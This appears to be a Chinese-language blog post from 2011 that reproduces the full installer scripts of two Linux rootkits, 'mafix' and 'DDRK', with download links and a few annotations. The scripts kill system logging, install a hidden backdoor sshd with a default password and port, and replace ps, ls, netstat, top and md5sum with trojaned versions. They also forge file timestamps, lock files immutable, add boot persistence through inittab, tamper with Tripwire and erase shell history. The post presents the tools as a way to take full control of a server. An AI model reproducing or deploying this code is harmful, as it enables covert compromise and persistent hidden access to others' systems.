2011年6月

MAFIX - Linux 2.6 rootkit

这后门很贱,服务器中过一次,属于这个后门的改版。那个添加了模块。

下载地址:

https://forum.eviloctal.com/attachment.php?aid=13419

内容:

MAXFIX

---HOW-TO

---mafix

---mafixlibs  

---root

 

下面为root的内容,也就是安装脚本。

#!/bin/bash

######################

# mafix 0.2          #

# fud 2009/07/15     #

######################

 

BASEDIR=`pwd`

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

BLK=' [1;30m'

MAG=' [1;35m'

CYN=' [1;30m'

RED='^[[1;32m'

DMAG=' [1;37m'

RES=' [0m'

 

echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"

echo "${CYN}     /__/         /  /         /  /   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"

echo "${CYN}    |  |::       /  /::       /  /:/_  ${DMAG}  /  /    ${CYN}    |  |:|    ${RES}"

echo "${CYN}    |  |:|:     /  /:/:     /  /:/ / ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"

echo "${CYN}  __|__|:|:   /  /:/~/::   /  /:/ /:/ ${DMAG}/__/::    ${CYN}  __|__|:|    ${RES}"

echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/  ${DMAG}__/:__ ${CYN} /__/::::____${RES}"

echo "${CYN}  :~~__/  :/:/__/  :/:/   ${DMAG}    :/ ${CYN}   ~~~::::/${RES}"

echo "${CYN}    :          ::/        ::/    ${DMAG}    __::/${CYN}     |~~|:|~~ ${RES}"

echo "${CYN}    :          :          :    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"

echo "${CYN}      :          :          :   ${DMAG}    __/  ${CYN}     |  |:|   ${RES}"

echo "${CYN}     __/         __/         __/   ${DMAG}           ${CYN}     |__|/    ${RES}"

echo "${DMAG}${RES}"

echo "${DMAG}- the ferrari of rootkits - ${RES}"

sleep 5

echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"

tar zxf mafixlibs

if [ "$(whoami)" != "root" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"

   exit

fi

cd $BASEDIR

sleep 1

killall -9 syslogd >/dev/null 2>&1

startime=`date +%S`

 

echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"

SYSLOGCONF="/etc/syslog.conf"

REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`

if [ ! -z "$REMOTE" ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"

        echo

        for host in $REMOTE; do

                echo -n "            "

                echo $host

        done

        echo

        echo ' ${CYN}coz this box is logging to it${RES}'

        echo

else

echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"

fi

uname=`uname -n`

twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then

echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then

      chattr -isa $twd                                          #去保护,如果有的话,覆盖,chattr +isa 写保护

   else

echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"

   fi

else

echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"

fi

# restoring login

if [ -f /sbin/xlogin ]; then

   chattr -isa /sbin/xlogin

   chattr -isa /bin/login

   mv -f /sbin/xlogin /bin/login

   chmod 7455 /bin/login

   chattr +isa /bin/login

fi

echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"

if [ -f /etc/sh.conf ]; then

  chattr -isa /etc/sh.conf

  rm -rf /etc/sh.conf

fi

# checking if we got needed libs and filez

if [ ! -f /lib/libproc.a ]; then

   mv bin/lib/libproc.a /lib/ 2>/dev/null

fi

 

if [ ! -f /lib/libproc.so.2.0.6 ]; then

   mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null

fi

echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"

/sbin/ldconfig >/dev/null 2>&1

 

if [ ! -f /usr/bin/md5sum ]; then

   touch -acmr /bin/ls bin/md5sum

   cp bin/md5sum /usr/bin/md5sum

fi

DEFPASS=race

DEFPORT=11111

if test -n "$1" ; then

   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"

   cd $BASEDIR/bin

   echo -n $1|md5sum > /etc/sh.conf                                #生成密码文件

else

   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"

   echo -n $DEFPASS|md5sum > /etc/sh.conf

fi

 

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

chattr +isa /etc/sh.conf                                                #写保护

 

if test -n "$2" ; then

   echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"

   echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

   echo "3 $2" >> $BASEDIR/bin/headers/hosts.h

   echo "4 $2" >> $BASEDIR/bin/headers/hosts.h

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null

else

   echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"

   echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

  

   echo "3 $2" >> $BASEDIR/bin/headers/hosts.h

   echo "4 $2" >> $BASEDIR/bin/headers/hosts.h

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $B
ASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null

fi

 

if [ -f /lib/lidps1.so ]; then

  chattr -isa /lib/lidps1.so

  rm -rf /lib/lidps1.so

fi

 

if [ -f /usr/include/hosts.h ]; then

  chattr -isa /usr/include/hosts.h

  rm -rf /usr/include/hosts.h

fi

 

if [ -f /usr/include/file.h ]; then

  chattr -isa /usr/include/file.h

  rm -rf /usr/include/file.h

fi

 

if [ -f /usr/include/log.h ]; then

  chattr -isa /usr/include/log.h

  rm -rf /usr/include/log.h

fi

 

if [ -f /usr/include/proc.h ]; then

  chattr -isa /usr/include/proc.h

  rm -rf /usr/include/proc.h

fi

 

cd $BASEDIR

mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null

touch -acmr /bin/ls /lib/lidps1.so                                       #修改文件时间与/bin/ls 时间相同

touch -acmr /bin/ls $BASEDIR/bin/headers/*                    #修改时间

mv $BASEDIR/bin/headers/*  /usr/include/ 2>/dev/null

 

# Ok lets start creating dirs

 

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

 

if [ -d /lib/libsh.so ]; then

   chattr -isa /lib/libsh.so

   chattr -isa /lib/libsh.so/*

   rm -rf /lib/libsh.so

fi

 

if [ -d /usr/lib/libsh ]; then

   chattr -isa /usr/lib/libsh

   chattr -isa /usr/lib/libsh/*

   rm -rf /usr/lib/libsh/*

fi

 

mkdir $SSHDIR 2>/dev/null

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR 2>/dev/null

touch -acmr /bin/ls $HOMEDIR

 

cd $BASEDIR/bin

mv .sh/* $SSHDIR/ 2>/dev/null

mv .sh/.bashrc $HOMEDIR 2>/dev/null

 

if [ -f /sbin/ttyload ]; then

   chattr -AacdisSu /sbin/ttyload

   rm -rf /sbin/ttyload

fi

 

if [ -f /usr/sbin/ttyload ]; then

   chattr -isa /usr/sbin/ttyload

   rm -rf /usr/sbin/ttyload

fi

 

if [ -f /sbin/ttymon ]; then

   chattr -isa /sbin/ttymon

   rm -rf /sbin/ttymon

fi

 

mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null

chmod a+xr /sbin/ttyload 2>/dev/null

chmod o-w /sbin/ttyload 2>/dev/null

touch -acmr /bin/ls /sbin/ttyload

chattr +isa /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

 

mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null

chmod a+xr /sbin/ttymon 2>/dev/null

touch -acmr /bin/ls /sbin/ttymon

chattr +isa /sbin/ttymon

kill -9 `pidof ttymon` >/dev/null 2>&1

 

cp /bin/bash $SSHDIR

 

# INITTAB SHUFFLING

 

chattr -isa /etc/inittab

cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1

cat /etc/inittab |grep getty > /tmp/.init2

echo "# Loading standard ttys" >> /tmp/.init1

echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1

cat /tmp/.init2 >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# modem getty." >> /tmp/.init1

echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# fax getty (hylafax)" >> /tmp/.init1

echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# vbox (voice box) getty" >> /tmp/.init1

echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1

echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1

echo "" >> /tmp/.init1

echo "# end of /etc/inittab" >> /tmp/.init1

echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload

echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload

touch -acmr /bin/ls /usr/sbin/ttyload

chmod +x /usr/sbin/ttyload 2>/dev/null

chattr +isa /usr/sbin/ttyload

/usr/sbin/ttyload >/dev/null 2>&1

 

touch -amcr /etc/inittab /tmp/.init1

mv -f /tmp/.init1 /etc/inittab 2>/dev/null

rm -rf /tmp/.init2

 

# MAKING SURE WE GOT IT BACKDORED RIGHT !

 

if [ ! "`grep ttyload /etc/inittab`" ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"

fi

 

# Say hello to md5sum fixer boys n gurls !

 

if [ -f /sbin/ifconfig ]; then

   /usr/bin/md5sum /sbin/ifconfig >> .shmd5

fi

if [ -f /bin/ps ]; then

   /usr/bin/md5sum /bin/ps >> .shmd5

fi

if [ -f /bin/ls ]; then

   /usr/bin/md5sum /bin/ls >> .shmd5

fi

if [ -f /bin/netstat ]; then

   /usr/bin/md5sum /bin/netstat >> .shmd5

fi

if [ -f /usr/bin/find ]; then

   /usr/bin/md5sum /usr/bin/find >> .shmd5

fi

if [ -f /usr/bin/top ]; then

   /usr/bin/md5sum /usr/bin/top >> .shmd5

fi

if [ -f /usr/sbin/lsof ]; then

   /usr/bin/md5sum /usr/sbin/lsof >> .shmd5

fi

if [ -f /usr/bin/slocate ]; then

   /usr/bin/md5sum /usr/bin/slocate >> .shmd5

fi

if [ -f /usr/bin/dir ]; then

   /usr/bin/md5sum /usr/bin/dir >> .shmd5

fi

if [ -f /usr/bin/md5sum ]; then

   /usr/bin/md5sum /usr/bin/md5sum >> .shmd5

fi

 

 

if [ ! -f /dev/srd0 ]; then

  ./encrypt -e .shmd5 /dev/srd0

  touch -acmr /bin/ls /dev/srd0

  chattr a+r /dev/srd0

  chown -f root:root /dev/srd0

fi

 

rm -rf .shmd5

 

 

# time change bitch

 

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1

touch -acmr /bin/ps ps >/dev/null 2>&1

touch -acmr /bin/ls ls >/dev/null 2>&1

touch -acmr /bin/netstat netstat >/dev/null 2>&1

touch -acmr /usr/bin/find find >/dev/null 2>&1

touch -acmr /usr/bin/top top >/dev/null 2>&1

touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1

touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1

touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1

touch -acmr /usr/bin/dir dir >/dev/null 2>&1

touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1

touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

 

 

# Backdoor ps/top/du/ls/netstat/etc..

 

cd $BASEDIR/bin

 

BACKUP=/usr/lib/libsh/.backup

mkdir $BACKUP 2>/dev/null

 

# ps ...

if [ -f /usr/bin/ps ]; then

   chattr -isa /usr/bin/ps

   cp /usr/bin/ps $BACKUP

   mv -f ps /usr/bin/ps 2>/dev/null

   chattr +isa /usr/bin/ps

fi

 

if [ -f /bin/ps ]; then

   chattr -isa /bin/ps

   cp /bin/ps $BACKUP

   mv -f ps /bin/ps 2>/dev/null

   chattr +isa /bin/ps

fi

 

# ifconfig ...

chattr -isa /sbin/ifconfig

cp /sbin/ifconfig $BACKUP

mv -f ifconfig /sbin/ifconfig 2>/dev/null

chattr +isa
/sbin/ifconfig

 

# netstat ...

if [ -f /usr/sbin/netstat ]; then

  chattr -isa /usr/sbin/netstat

  mv -f netstat /usr/sbin/netstat 2>/dev/null

  chattr +isa /usr/sbin/netstat

fi

 

chattr -isa /bin/netstat

cp /bin/netstat $BACKUP

mv -f netstat /bin/netstat 2>/dev/null

chattr +isa /bin/netstat

 

# top ...

if [ -f /usr/bin/top ]; then

   chattr -isa /usr/bin/top

   cp /usr/bin/top $BACKUP

   mv -f top /usr/bin/top 2>/dev/null

   chattr +isa /usr/bin/top

   if [ -f /lib/libncurses.so.5 ]; then

      ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null

   fi

   if [ -f /usr/lib/libncurses.so.5 ]; then

      ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null

   fi

fi

 

# slocate ...

if [ -f /usr/bin/slocate ]; then

   chattr -isa /usr/bin/slocate

   cp /usr/bin/slocate $BACKUP

   mv -f slocate /usr/bin/slocate 2>/dev/null

   chattr +isa /usr/bin/slocate

fi

 

# ls ...

chattr -isa /bin/ls

cp /bin/ls $BACKUP

mv -f ls /bin/ls 2>/dev/null

chattr +isa /bin/ls

 

# find ...

if [ -f /usr/bin/find ]; then

   chattr -isa /usr/bin/find

   cp /usr/bin/find $BACKUP

   mv -f find /usr/bin/find 2>/dev/null

   chattr +isa /usr/bin/find

fi

 

# dir ...

if [ -f /usr/bin/dir ]; then

   chattr -isa /usr/bin/dir

   cp /usr/bin/dir $BACKUP

   mv -f dir /usr/bin/dir 2>/dev/null

   chattr +isa /usr/bin/dir

fi

 

# lsof ...

if [ -f /usr/sbin/lsof ]; then

   chattr -isa /usr/sbin/lsof

   cp /usr/sbin/lsof $BACKUP

   mv -f lsof /usr/sbin/lsof 2>/dev/null

   chattr +isa /usr/sbin/lsof

fi

 

# pstree ...

if [ -f /usr/bin/pstree ]; then

   chattr -isa /usr/bin/pstree

   cp /usr/bin/pstree $BACKUP

   mv -f pstree /usr/bin/pstree 2>/dev/null

   chattr +isa /usr/bin/pstree

fi

 

# md5sum ...

chattr -isa /usr/bin/md5sum

cp /usr/bin/md5sum $BACKUP

mv -f md5sum /usr/bin/md5sum 2>/dev/null

chattr +isa /usr/bin/md5sum

echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"

 

cd $BASEDIR

 

mkdir $HOMEDIR/.sniff 2>/dev/null

mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null

chmod +x $BASEDIR/bin/sshd 2>/dev/null

mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null

mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null

mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff

touch -acmr /bin/ls $HOMEDIR/.sniff/shp

touch -acmr /bin/ls $HOMEDIR/shsb

touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/* 2>/dev/null

chmod +x $HOMEDIR/shsb 2>/dev/null

chmod +x $HOMEDIR/hide 2>/dev/null

./bin/sshd $1 $2 >> /dev/null

   echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"

ps aux > /tmp/.procs

 

if [ "`cat /tmp/.procs | grep named`" ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"

fi

 

if [ -f /usr/sbin/wu.ftpd ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"

fi

 

if [ "`cat /tmp/.procs | grep smbd`" ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"

fi

 

if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"

fi

 

rm -rf /tmp/.procs

 

netstat -natp > /tmp/.stats

 

if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then

   echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"

fi

 

rm -rf /tmp/.stats

 

 

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS

 

 

mkdir $HOMEDIR/.owned 2>/dev/null

 

if [ -f /etc/ttyhash ]; then

   chattr -AacdisSu /etc/ttyhash

   rm -rf /etc/ttyhash

fi

 

if [ -d /lib/ldd.so ]; then

   chattr -isa /lib/ldd.so

   chattr -isa /lib/ldd.so/*

   mv /lib/ldd.so $HOMEDIR/.owned/tk8

   echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"

fi

 

if [ -d /usr/src/.puta ]; then

   chattr -isa /usr/src/.puta

   chattr -isa /usr/src/.puta/*

   mv /usr/src/.puta $HOMEDIR/.owned/tk7

   echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"

fi

 

if [ -f /usr/sbin/xntpd ]; then

   chattr -isa /usr/sbin/xntpd

   rm -rf /usr/sbin/xntpd

fi

 

if [ -f /usr/sbin/nscd ]; then

   chattr -isa /usr/sbin/nscd

   rm -rf /usr/sbin/nscd

fi

 

if [ -d /usr/include/bex ]; then

   chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz

   chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h

   chattr -isa /usr/include/bex

   chattr -isa /usr/include/bex/*

   mv /usr/include/bex/ $HOMEDIR/.owned/bex2

   if [ -f /var/log/tcp.log ]; then

      chattr -isa /var/log/tcp.log

      cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog

   fi

   chattr -isa /usr/bin/sshd2 >/dev/null 2>&1

   rm -rf /usr/bin/sshd2 >/dev/null 2>&1

   echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"

fi

 

if [ -d /dev/tux/ ]; then

   chattr -isa /usr/bin/xsf >/dev/null 2>&1

   rm -rf /usr/bin/xsf >/dev/null 2>&1

   chattr -isa /usr/bin/xchk >/dev/null 2>&1

   rm -rf /usr/bin/xchk >/dev/null 2>&1

   chattr -isa /dev/tux >/dev/null 2>&1

   mv /dev/tux $HOMEDIR/.owned/tuxkit

   echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"

fi

 

if [ -f /usr/bin/ssh2d ]; then

   chattr -isa /usr/bin/ssh2d

   rm -rf /usr/bin/ssh2d

   chattr -isa /lib/security/.config/

   chattr -isa /lib/security/.config/*

   rm -rf /lib/security/.config

   echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"

fi

 

if [ -f /etc/ld.so.hash ]; then

   chattr -isa /etc/ld.so.hash

   rm -rf /etc/ld.so.hash

fi

 

 

chattr +isa /usr/lib/libsh

chattr +isa /lib/libsh.so

 

# GREPPING SHITZ FROM rc.sysinit and inetd.conf

 

if [ -f /etc/rc.d/rc.sysinit ]; then

   chattr -isa /etc/rc.d/rc.sysinit

   cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/us
r/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep

   chmod +x /tmp/.grep

   touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep

   mv -f /tmp/.grep /etc/rc.d/rc.sysinit

   rm -rf /tmp/.grep

fi

 

if [ -f /etc/inetd.conf ]; then

   chattr -isa /etc/inetd.conf

   cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep

   touch -acmr /etc/inted.conf /tmp/.grep

   mv -f /tmp/.grep /etc/inetd.conf

   rm -rf /tmp/.grep

fi

 

 

# KILLING SOME LAMME DAEMONS

 

killall -9 -q nscd >/dev/null 2>&1

killall -9 -q xntps >/dev/null 2>&1

killall -9 -q mountd >/dev/null 2>&1

killall -9 -q mserv >/dev/null 2>&1

killall -9 -q psybnc >/dev/null 2>&1

killall -9 -q t0rns >/dev/null 2>&1

killall -9 -q linsniffer >/dev/null 2>&1

killall -9 -q sniffer >/dev/null 2>&1

killall -9 -q lpsched >/dev/null 2>&1

killall -9 -q sniff >/dev/null 2>&1

killall -9 -q sn1f >/dev/null 2>&1

killall -9 -q sshd2 >/dev/null 2>&1

killall -9 -q xsf >/dev/null 2>&1

killall -9 -q xchk >/dev/null 2>&1

killall -9 -q ssh2d >/dev/null 2>&1

 

 

   echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"

MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`

echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"

uname -a | awk '{ print  $11 }' >/tmp/info_tmp

echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"

echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+-  Might be ["`/sbin/ifconfig | grep eth | wc -l`" ] active adapters.${RES}"

 

if [ -f /etc/redhat-release ]; then

    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"

elif [ -f /etc/slackware-version ]; then

    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"

elif [ -f /etc/debian_version ]; then

    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"

elif [ -f /etc/SuSE-release ]; then

    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"

elif [ -f /etc/issue ]; then

    echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"

else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"

fi

echo

echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

if [ -f /.bash_history ]; then

   chattr -isa /.bash_history >/dev/null 2>&1

   rm -rf /.bash_history

fi

 

if [ -f /bin/.bash_history ]; then

   chattr -isa /bin/.bash_history

   rm -rf /bin/.bash_history

fi

cd $BASEDIR

rm -rf /tmp/.r*

cd ..

rm -rf mafix*

echo -n "${CYN}done!${RES}"

echo

rm -rf /tmp/info_tmp

endtime=`date +%S`

echo

echo

echo "${CYN}      ___           ___           ___    ${DMAG}           ${CYN}      ___     ${RES}"

echo "${CYN}     /__/         /  /         /  /   ${DMAG}   ___     ${CYN}     /__/|    ${RES}"

echo "${CYN}    |  |::       /  /::       /  /:/_  ${DMAG}  /  /    ${CYN}    |  |:|    ${RES}"

echo "${CYN}    |  |:|:     /  /:/:     /  /:/ / ${DMAG} /  /:/    ${CYN}    |  |:|    ${RES}"

echo "${CYN}  __|__|:|:   /  /:/~/::   /  /:/ /:/ ${DMAG}/__/::    ${CYN}  __|__|:|    ${RES}"

echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/  ${DMAG}__/:__ ${CYN} /__/::::____${RES}"

echo "${CYN}  :~~__/  :/:/__/  :/:/   ${DMAG}    :/ ${CYN}   ~~~::::/${RES}"

echo "${CYN}    :          ::/        ::/    ${DMAG}    __::/${CYN}     |~~|:|~~ ${RES}"

echo "${CYN}    :          :          :    ${DMAG}    /__/:/ ${CYN}     |  |:|   ${RES}"

echo "${CYN}      :          :          :   ${DMAG}    __/  ${CYN}     |  |:|   ${RES}"

echo "${CYN}     __/         __/         __/   ${DMAG}           ${CYN}     |__|/    ${RES}"

echo "${DMAG}${RES}"

echo "${DMAG}                  Password: $1                                        ${RES}"

echo "${DMAG}                    Port: $2                                        ${RES}"

 

if [ -f /usr/sbin/syslogd ]; then

   /usr/sbin/syslogd -m 0

else

   /sbin/syslogd -m 0

fi

 

if [ -f /usr/sbin/inetd ]; then

   killall -HUP inetd >/dev/null 2>&1

elif [ -f /usr/sbin/xinetd ]; then

   killall -HUP xinetd

fi

 

 

DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。

DDRK中包含的文件:

netstat  #替换系统中的netstat,从ssh配置文件中读取端口并隐藏

rk.ko  #内核模块,实现文件和进程的隐藏功能

setup  #rootkit安装文件

tty  #ava工具

bin.tgz

         ---ttymon

         ---sshd.tgz

                   ---.sh

                            ---shdcf2  #sshd配置文件

                            ---shhk

                            ---shhk.pub

                            ---shrs

                            ---sshd  #sshd主程序

DDRK下载地址:http://www.sectop.com/soft/ddrk.tgz

因此只要把这些文件上传到服务器上并成功运行,就可以获得该服务器的root权限。为所欲为,无所不能。

 

setup内容如下:

#!/bin/bash

 

##########define variables##########

DEFPASS=123456    //默认密码

DEFPORT=43958    //默认端口

BASEDIR=`pwd`

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

 

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

 

##########check is root##########

if [ "$(whoami)" != "root" ]; then

   echo "BECOME ROOT AND TRY AGAIN"

   echo ""

   exit

fi

 

##########extract all tar##########

tar zxf bin.tgz

cd bin

tar zxf sshd.tgz

rm -rf ./sshd.tgz

cd $BASEDIR

rm -rf bin.tgz

cd $BASEDIR

 

##########kill syslogd##########

killall -9 syslogd >/dev/null 2>&1

sleep 2

 

##########remove sh.conf##########

if [ -f /etc/sh.conf ]; then

  rm -rf /etc/sh.conf         //经过md5sum加密过的密码文件

fi

 

##########initialize sshd configuration##########

if test -n "$1" ; then

   echo "Using Password : $1"

   cd $BASEDIR/bin

   echo -n $1|md5sum > /etc/sh.conf

else

   echo "No Password Specified, using default - $DEFPASS"

   echo -n $DEFPASS|md5sum > /etc/sh.conf

fi

 

 

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

 

if test -n "$2" ; then

   echo "Using ssh-port : $2"

   echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

else

   echo "No ssh-port Specified, using default - $DEFPORT"

   echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

fi

 

###########creating dirs##########

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

 

if [ -d /lib/libsh.so ]; then

   rm -rf /lib/libsh.so

fi

 

if [ -d /usr/lib/libsh ]; then

   rm -rf /usr/lib/libsh/*

fi

 

mkdir $SSHDIR

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR

touch -acmr /bin/ls $HOMEDIR

 

cd $BASEDIR/bin

mv .sh/* $SSHDIR/

mv .sh/.bashrc $HOMEDIR

 

if [ -f /sbin/ttyload ]; then

   chattr -AacdisSu /sbin/ttyload

   rm -rf /sbin/ttyload

fi

 

if [ -f /usr/sbin/ttyload ]; then

   rm -rf /usr/sbin/ttyload

fi

 

if [ -f /sbin/ttymon ]; then

   rm -rf /sbin/ttymon

fi

 

mv $SSHDIR/sshd /sbin/ttyload

chmod a+xr /sbin/ttyload

chmod o-w /sbin/ttyload

touch -acmr /bin/ls /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

 

mv $BASEDIR/bin/ttymon /sbin/ttymon

chmod a+xr /sbin/ttymon

touch -acmr /bin/ls /sbin/ttymon

kill -9 `pidof ttymon` >/dev/null 2>&1

 

cp /bin/bash $SSHDIR

 

##########modify inittab##########

cp /etc/inittab /etc/.inittab

sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@' /etc/inittab > /etc/.inittab

touch -acmr /etc/inittab /etc/.inittab

mv -f /etc/.inittab /etc/inittab

 

echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload

echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload

 

touch -acmr /bin/ls /usr/sbin/ttyload

chmod 755 /usr/sbin/ttyload

/usr/sbin/ttyload > /dev/null 2>&1

 

